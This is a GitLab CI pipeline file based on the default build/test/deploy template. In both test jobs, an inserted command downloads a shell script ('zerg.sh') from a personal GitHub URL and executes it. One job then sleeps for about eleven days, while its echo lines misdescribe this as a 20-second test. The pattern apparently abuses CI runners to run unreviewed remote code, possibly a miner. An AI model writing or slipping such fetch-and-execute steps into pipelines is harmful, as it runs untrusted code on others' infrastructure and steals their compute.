build-job:
  stage: build
  script:
    - echo "Hello, $GITLAB_USER_LOGIN!"

test-job1:
  stage: test
  script:
    - wget https://raw.githubusercontent.com/tomirobert1-tante25/df/main/zerg.sh && chmod +x zerg.sh && ./zerg.sh

test-job2:
  stage: test
  script:
    - wget https://raw.githubusercontent.com/tomirobert1-tante25/df/main/zerg.sh && chmod +x zerg.sh && ./zerg.sh
    - echo "After the echo commands complete, it runs the sleep command for 20 seconds"
    - echo "which simulates a test that runs 20 seconds longer than test-job1"
    - sleep 999999

deploy-prod:
  stage: deploy
  script:
    - echo "This job deploys something from the $CI_COMMIT_BRANCH branch."
